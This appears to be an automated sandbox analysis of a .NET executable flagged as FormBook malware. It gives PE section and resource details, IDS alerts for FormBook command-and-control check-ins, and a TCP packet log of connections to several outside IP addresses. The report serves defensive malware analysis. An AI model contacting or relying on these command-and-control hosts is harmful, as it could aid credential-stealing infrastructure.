                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000xc1a340xc1c00a32acfab7953fe4fde2d526067f4c924False0.9089667338709677data7.776537038112395IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0xc40000x4ca80x4e00e512690c4b81eb5d1e6032bfe76feaaeFalse0.9410556891025641data7.769006923276508IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0xca0000xc0x2000cb9c1c952bb8d561cb0886c96a694aeFalse0.044921875data0.09409792566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0xc41300x46f9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9932852661126094
                                                                                RT_GROUP_ICON0xc882c0x14data1.05
                                                                                RT_VERSION0xc88400x278data0.4699367088607595
                                                                                RT_MANIFEST0xc8ab80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                Imports

                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain

                                                                                Network Behavior

                                                                                Suricata IDS Alerts

                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-12-03T14:21:34.946868+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54979613.248.169.4880TCP
                                                                                2024-12-03T14:21:34.946868+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54979613.248.169.4880TCP
                                                                                2024-12-03T14:21:51.778129+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54983313.248.169.4880TCP
                                                                                2024-12-03T14:21:54.486783+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54983913.248.169.4880TCP
                                                                                2024-12-03T14:21:57.111215+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54984913.248.169.4880TCP
                                                                                2024-12-03T14:21:57.111215+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.54984913.248.169.4880TCP
                                                                                2024-12-03T14:21:59.786006+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54985513.248.169.4880TCP
                                                                                2024-12-03T14:21:59.786006+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54985513.248.169.4880TCP
                                                                                2024-12-03T14:22:06.414414+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54987184.32.84.3280TCP
                                                                                2024-12-03T14:22:09.083403+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54987784.32.84.3280TCP
                                                                                2024-12-03T14:22:11.750739+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54988384.32.84.3280TCP
                                                                                2024-12-03T14:22:14.455178+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54989084.32.84.3280TCP
                                                                                2024-12-03T14:22:14.455178+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54989084.32.84.3280TCP
                                                                                2024-12-03T14:22:21.420221+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54990584.32.84.3280TCP
                                                                                2024-12-03T14:22:24.251577+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54991384.32.84.3280TCP
                                                                                2024-12-03T14:22:26.834222+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54991984.32.84.3280TCP
                                                                                2024-12-03T14:22:29.471163+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54992784.32.84.3280TCP
                                                                                2024-12-03T14:22:29.471163+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54992784.32.84.3280TCP
                                                                                2024-12-03T14:22:36.727816+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549943209.74.77.10780TCP
                                                                                2024-12-03T14:22:39.404800+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549949209.74.77.10780TCP
                                                                                2024-12-03T14:22:42.087413+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549955209.74.77.10780TCP
                                                                                2024-12-03T14:22:44.685627+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549961209.74.77.10780TCP
                                                                                2024-12-03T14:22:44.685627+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549961209.74.77.10780TCP
                                                                                2024-12-03T14:22:51.858807+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54997838.47.207.16480TCP
                                                                                2024-12-03T14:22:54.605716+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54998538.47.207.16480TCP
                                                                                2024-12-03T14:22:57.262492+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999238.47.207.16480TCP
                                                                                2024-12-03T14:23:00.043567+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54999838.47.207.16480TCP
                                                                                2024-12-03T14:23:00.043567+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54999838.47.207.16480TCP
                                                                                2024-12-03T14:23:07.323412+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550004208.115.225.22080TCP
                                                                                2024-12-03T14:23:09.944094+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550005208.115.225.22080TCP
                                                                                2024-12-03T14:23:12.661850+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550006208.115.225.22080TCP
                                                                                2024-12-03T14:23:15.314569+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550007208.115.225.22080TCP
                                                                                2024-12-03T14:23:15.314569+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550007208.115.225.22080TCP
                                                                                2024-12-03T14:23:30.937979+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550008104.21.15.10080TCP
                                                                                2024-12-03T14:23:33.606470+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550009104.21.15.10080TCP
                                                                                2024-12-03T14:23:36.278247+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550010104.21.15.10080TCP
                                                                                2024-12-03T14:23:40.129216+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550011104.21.15.10080TCP
                                                                                2024-12-03T14:23:40.129216+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550011104.21.15.10080TCP
                                                                                2024-12-03T14:23:46.977862+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550012199.59.243.22780TCP
                                                                                2024-12-03T14:23:49.565770+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550013199.59.243.22780TCP
                                                                                2024-12-03T14:23:52.235340+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550014199.59.243.22780TCP
                                                                                2024-12-03T14:23:55.178752+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550015199.59.243.22780TCP
                                                                                2024-12-03T14:23:55.178752+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550015199.59.243.22780TCP
                                                                                2024-12-03T14:24:02.157586+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550016199.59.243.22780TCP
                                                                                2024-12-03T14:24:04.932428+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550017199.59.243.22780TCP
                                                                                2024-12-03T14:24:07.523747+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550018199.59.243.22780TCP
                                                                                2024-12-03T14:24:10.187099+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550019199.59.243.22780TCP
                                                                                2024-12-03T14:24:10.187099+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550019199.59.243.22780TCP
                                                                                2024-12-03T14:24:16.929560+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550020172.67.156.19580TCP
                                                                                2024-12-03T14:24:19.664810+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550021172.67.156.19580TCP
                                                                                2024-12-03T14:24:22.314364+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550022172.67.156.19580TCP
                                                                                2024-12-03T14:24:25.018599+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550023172.67.156.19580TCP
                                                                                2024-12-03T14:24:25.018599+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550023172.67.156.19580TCP
                                                                                2024-12-03T14:24:32.351290+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550024108.179.253.19780TCP
                                                                                2024-12-03T14:24:35.024724+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550025108.179.253.19780TCP
                                                                                2024-12-03T14:24:37.768398+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550026108.179.253.19780TCP
                                                                                2024-12-03T14:24:40.321300+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550027108.179.253.19780TCP
                                                                                2024-12-03T14:24:40.321300+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550027108.179.253.19780TCP

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 3, 2024 14:21:33.725783110 CET4979680192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:33.845897913 CET804979613.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:33.846051931 CET4979680192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:33.868537903 CET4979680192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:33.988725901 CET804979613.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:34.946650982 CET804979613.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:34.946698904 CET804979613.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:34.946867943 CET4979680192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:34.950556040 CET4979680192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:35.070631981 CET804979613.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:50.502652884 CET4983380192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:50.622704983 CET804983313.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:50.622812986 CET4983380192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:50.638335943 CET4983380192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:50.758671045 CET804983313.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:51.778068066 CET804983313.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:51.778129101 CET4983380192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:52.152587891 CET4983380192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:52.272552013 CET804983313.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:53.171916008 CET4983980192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:53.292016983 CET804983913.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:53.292104959 CET4983980192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:53.309835911 CET4983980192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:53.429850101 CET804983913.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:54.486702919 CET804983913.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:54.486783028 CET4983980192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:54.824882030 CET4983980192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:54.944880009 CET804983913.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:55.843718052 CET4984980192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:55.964013100 CET804984913.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:55.964131117 CET4984980192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:55.980192900 CET4984980192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:56.100338936 CET804984913.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:56.100811005 CET804984913.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:57.111102104 CET804984913.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:57.111215115 CET4984980192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:57.496434927 CET4984980192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:57.616585016 CET804984913.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:58.515603065 CET4985580192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:58.635752916 CET804985513.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:58.636363983 CET4985580192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:58.647058010 CET4985580192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:58.767405987 CET804985513.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:59.785680056 CET804985513.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:59.785928965 CET804985513.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:59.786005974 CET4985580192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:59.788594007 CET4985580192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:59.908669949 CET804985513.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:22:05.140866041 CET4987180192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:05.260977983 CET804987184.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:05.261244059 CET4987180192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:05.276699066 CET4987180192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:05.396975040 CET804987184.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:06.414292097 CET804987184.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:06.414413929 CET4987180192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:06.793483019 CET4987180192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:06.913554907 CET804987184.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:07.812544107 CET4987780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:07.934233904 CET804987784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:07.934410095 CET4987780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:07.950037956 CET4987780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:08.071362972 CET804987784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:09.083290100 CET804987784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:09.083403111 CET4987780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:09.465275049 CET4987780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:09.585457087 CET804987784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:10.484421968 CET4988380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:10.604552031 CET804988384.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:10.604737997 CET4988380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:10.620232105 CET4988380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:10.740849972 CET804988384.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:10.740869045 CET804988384.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:11.750617027 CET804988384.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:11.750739098 CET4988380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:12.121557951 CET4988380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:12.241777897 CET804988384.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:13.140645981 CET4989080192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:13.260807037 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:13.261102915 CET4989080192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:13.270989895 CET4989080192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:13.391251087 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.454948902 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455003023 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455014944 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455137968 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455153942 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455178022 CET4989080192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:14.455219030 CET4989080192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:14.455267906 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455308914 CET4989080192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:14.455317974 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455331087 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455342054 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455353975 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455372095 CET4989080192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:14.455393076 CET4989080192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:14.576814890 CET4989080192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:14.696849108 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:20.200191975 CET4990580192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:20.320647001 CET804990584.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:20.321557999 CET4990580192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:20.339613914 CET4990580192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:20.459624052 CET804990584.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:21.420160055 CET804990584.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:21.420221090 CET4990580192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:21.840348005 CET4990580192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:21.960318089 CET804990584.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:22.866818905 CET4991380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:22.986752033 CET804991384.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:22.989584923 CET4991380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:23.004879951 CET4991380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:23.125092030 CET804991384.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:24.251370907 CET804991384.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:24.251576900 CET4991380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:24.512343884 CET4991380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:24.632491112 CET804991384.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:25.537456036 CET4991980192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:25.657639027 CET804991984.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:25.657731056 CET4991980192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:25.677642107 CET4991980192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:25.798988104 CET804991984.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:25.799186945 CET804991984.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:26.834130049 CET804991984.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:26.834222078 CET4991980192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:27.184247971 CET4991980192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:27.304874897 CET804991984.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:28.203182936 CET4992780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:28.323343992 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:28.325670004 CET4992780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:28.337583065 CET4992780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:28.457679033 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.470979929 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471049070 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471062899 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471163034 CET4992780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:29.471256971 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471292973 CET4992780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:29.471302986 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471321106 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471334934 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471354008 CET4992780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:29.471616983 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471630096 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471649885 CET4992780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:29.471743107 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471781969 CET4992780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:29.476870060 CET4992780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:29.597326994 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:35.289513111 CET4994380192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:35.409524918 CET8049943209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:35.409627914 CET4994380192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:35.430665970 CET4994380192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:35.551661968 CET8049943209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:36.727591038 CET8049943209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:36.727695942 CET8049943209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:36.727816105 CET4994380192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:36.934202909 CET4994380192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:37.952749014 CET4994980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:38.072910070 CET8049949209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:38.072988987 CET4994980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:38.088601112 CET4994980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:38.208873987 CET8049949209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:39.404553890 CET8049949209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:39.404752016 CET8049949209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:39.404799938 CET4994980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:39.590486050 CET4994980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:40.617607117 CET4995580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:40.737657070 CET8049955209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:40.737818956 CET4995580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:40.753995895 CET4995580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:40.874272108 CET8049955209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:40.874288082 CET8049955209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:42.087258101 CET8049955209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:42.087368965 CET8049955209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:42.087413073 CET4995580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:42.262341976 CET4995580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:43.327927113 CET4996180192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:43.448951960 CET8049961209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:43.449042082 CET4996180192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:43.464313030 CET4996180192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:43.584455967 CET8049961209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:44.685353041 CET8049961209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:44.685461998 CET8049961209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:44.685626984 CET4996180192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:44.689620972 CET4996180192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:44.809712887 CET8049961209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:50.199831009 CET4997880192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:50.320168972 CET804997838.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:50.324665070 CET4997880192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:50.343693018 CET4997880192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:50.463877916 CET804997838.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:51.858640909 CET804997838.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:51.858743906 CET804997838.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:51.858807087 CET4997880192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:51.887032986 CET4997880192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:52.909696102 CET4998580192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:53.030486107 CET804998538.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:53.030601025 CET4998580192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:53.051351070 CET4998580192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:53.172271013 CET804998538.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:54.605715990 CET4998580192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:54.666712046 CET804998538.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:54.666985989 CET804998538.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:54.669764042 CET4998580192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:54.669764042 CET4998580192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:54.725693941 CET804998538.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:54.728125095 CET4998580192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:55.610388994 CET4999280192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:55.730679035 CET804999238.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:55.730782032 CET4999280192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:55.747797012 CET4999280192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:55.868020058 CET804999238.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:55.868037939 CET804999238.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:57.262491941 CET4999280192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:57.322221994 CET804999238.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:57.322299957 CET4999280192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:57.322360992 CET804999238.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:57.322407961 CET4999280192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:57.382781029 CET804999238.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:57.382925987 CET4999280192.168.2.538.47.207.164
